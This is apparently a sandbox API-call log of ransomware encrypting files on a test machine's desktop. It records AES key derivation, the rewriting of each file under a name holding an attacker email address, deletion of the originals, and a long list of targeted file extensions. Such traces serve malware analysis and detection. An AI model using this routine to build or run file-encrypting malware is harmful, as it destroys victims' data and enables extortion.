	[0182.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.652] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.652] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.652] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.652] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.652] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x15c13, dwBufLen=0x15c13 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x15c20) returned 1
	[0182.655] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.655] RtlMoveMemory (in: Destination=0xff2da0, Source=0xfdd180, Length=0x15c13 | out: Destination=0xff2da0) 
	[0182.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.655] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2da0*, pdwDataLen=0x18bc0c*=0x15c13, dwBufLen=0x15c20 | out: pbData=0xff2da0*, pdwDataLen=0x18bc0c*=0x15c20) returned 1
	[0182.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.658] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.670] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.670] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0182.670] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.671] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.671] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.673] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 80
	[0182.673] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.674] WriteFile (in: hFile=0x388, lpBuffer=0xff2da0*, nNumberOfBytesToWrite=0x15c20, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff2da0*, lpNumberOfBytesWritten=0x18c068*=0x15c20, lpOverlapped=0x0) returned 1
	[0182.680] CloseHandle (hObject=0x388) returned 1
	[0182.680] CloseHandle (hObject=0x384) returned 1
	[0182.680] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf")) returned 1
	[0182.692] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf")) returned 0
	[0182.692] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359e0fc0, ftCreationTime.dwHighDateTime=0x1d967ab, ftLastAccessTime.dwLowDateTime=0x429f4e00, ftLastAccessTime.dwHighDateTime=0x1d9703e, ftLastWriteTime.dwLowDateTime=0x429f4e00, ftLastWriteTime.dwHighDateTime=0x1d9703e, nFileSizeHigh=0x0, nFileSizeLow=0x161f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zn3QSAS7Zk7M3A.bmp", cAlternateFileName="ZN3QSA~1.BMP")) returned 1
	[0182.692] lstrcmpW (lpString1="Zn3QSAS7Zk7M3A.bmp", lpString2="..") returned 1
	[0182.692] lstrcmpW (lpString1="Zn3QSAS7Zk7M3A.bmp", lpString2=".") returned 1
	[0182.692] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.692] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="Zn3QSAS7Zk7M3A.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Zn3QSAS7Zk7M3A.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Zn3QSAS7Zk7M3A.bmp"
	[0182.693] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Zn3QSAS7Zk7M3A.bmp") returned 48
	[0182.693] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.693] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Zn3QSAS7Zk7M3A.bmp", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp") returned 0x30
	[0182.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.693] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.693] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp") returned="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp"
	[0182.693] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp") returned 48
	[0182.693] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.694] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0182.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.694] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.694] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.695] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.695] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.700] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x161f1, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x161f1, lpOverlapped=0x0) returned 1
	[0182.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.705] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0182.707] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.707] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.707] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.707] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.707] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.707] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.707] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.708] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x161f1, dwBufLen=0x161f1 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x16200) returned 1
	[0182.711] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.711] RtlMoveMemory (in: Destination=0xff3380, Source=0xfdd180, Length=0x161f1 | out: Destination=0xff3380) 
	[0182.711] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.711] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3380*, pdwDataLen=0x18bc0c*=0x161f1, dwBufLen=0x16200 | out: pbData=0xff3380*, pdwDataLen=0x18bc0c*=0x16200) returned 1
	[0182.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.714] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.715] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.715] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0182.715] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.715] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.716] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.717] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 90
	[0182.717] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.724] WriteFile (in: hFile=0x388, lpBuffer=0xff3380*, nNumberOfBytesToWrite=0x16200, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff3380*, lpNumberOfBytesWritten=0x18c068*=0x16200, lpOverlapped=0x0) returned 1
	[0182.731] CloseHandle (hObject=0x388) returned 1
	[0182.731] CloseHandle (hObject=0x384) returned 1
	[0182.731] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp")) returned 1
	[0182.752] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zn3qsas7zk7m3a.bmp")) returned 0
	[0182.753] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4115b0, ftCreationTime.dwHighDateTime=0x1d969a8, ftLastAccessTime.dwLowDateTime=0xa14c0, ftLastAccessTime.dwHighDateTime=0x1d97332, ftLastWriteTime.dwLowDateTime=0xa14c0, ftLastWriteTime.dwHighDateTime=0x1d97332, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zU8X 1dSMP0P", cAlternateFileName="ZU8X1D~1")) returned 1
	[0182.753] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c97d70, ftCreationTime.dwHighDateTime=0x1d96eeb, ftLastAccessTime.dwLowDateTime=0xa992ec10, ftLastAccessTime.dwHighDateTime=0x1d9723d, ftLastWriteTime.dwLowDateTime=0xa992ec10, ftLastWriteTime.dwHighDateTime=0x1d9723d, nFileSizeHigh=0x0, nFileSizeLow=0xa169, dwReserved0=0x0, dwReserved1=0x0, cFileName="_1IeasQACw 4JkwJo9.swf", cAlternateFileName="_1IEAS~1.SWF")) returned 1
	[0182.753] lstrcmpW (lpString1="_1IeasQACw 4JkwJo9.swf", lpString2="..") returned 1
	[0182.753] lstrcmpW (lpString1="_1IeasQACw 4JkwJo9.swf", lpString2=".") returned 1
	[0182.753] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.753] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="_1IeasQACw 4JkwJo9.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\_1IeasQACw 4JkwJo9.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\_1IeasQACw 4JkwJo9.swf"
	[0182.753] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\_1IeasQACw 4JkwJo9.swf") returned 52
	[0182.753] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.754] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\_1IeasQACw 4JkwJo9.swf", cchLength=0x34 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf") returned 0x34
	[0182.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.754] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.754] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf"
	[0182.754] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf") returned 52
	[0182.754] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.755] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0182.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
